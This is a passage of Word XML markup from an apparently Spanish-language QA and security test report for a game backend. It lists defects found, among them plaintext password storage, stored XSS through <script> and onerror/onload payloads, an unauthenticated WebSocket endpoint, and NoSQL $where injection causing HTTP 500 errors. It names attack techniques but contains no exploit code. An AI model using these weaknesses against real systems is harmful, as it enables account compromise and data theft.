              <w:t xml:space="preserve">Error rate = 100%. ECONNREFUSED en todas las fases. El backend rechaza conexiones a partir de ~30 VUs concurrentes bajo estrés con BD en memoria.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Defectos Encontrados</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:left w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:right w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prueba Origen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-01</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Contraseñas en texto plano</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TC-SEC-01</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POST /auth/register almacena passwords sin bcrypt. Cualquier acceso a BD expone credenciales en claro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sin política de contraseñas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /auth/register acepta contraseñas débiles ("123", vacías, solo números). No hay validación de complejidad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFC000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-03</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XSS sin sanitizar en BD</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TC-SEC-06</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Campos username y bio almacenan payloads &lt;script&gt; y eventos onerror/onload sin escapar. Riesgo XSS almacenado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFC000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSocket sin autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">El endpoint ws://.../ws acepta conexiones sin JWT. Cualquier cliente anónimo puede unirse a matchmaking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-05</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Header X-Powered-By expuesto</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TC-SEC-09</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Express envía X-Powered-By: Express en respuestas. Revela stack tecnológico al atacante.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="595959"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bearer opcional en Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">El middleware acepta JWT sin prefijo "Bearer " usando replace(). Un token válido sin el prefijo correcto es aceptado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-07</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HTTP 500 ante $where NoSQL</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TC-SEC-02</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Operador $where en campo email produce HTTP 500 Internal Server Error (información de error expuesta).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFC000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend no sostiene 100+ concurrentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-04, TC-R-06, TC-R-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ERR_SOCKET_TIMEOUT y ECONNREFUSED a partir de 64+ VUs concurrentes. Sin connection pooling ni rate limiting adecuado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFC000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-02</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TC-R-02 WebSocket moves fallidos</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TC-R-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Artillery no puede completar escenarios de moves porque un solo VU no puede emparejarse consigo mismo. Test requiere diseño con pares sincronizados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
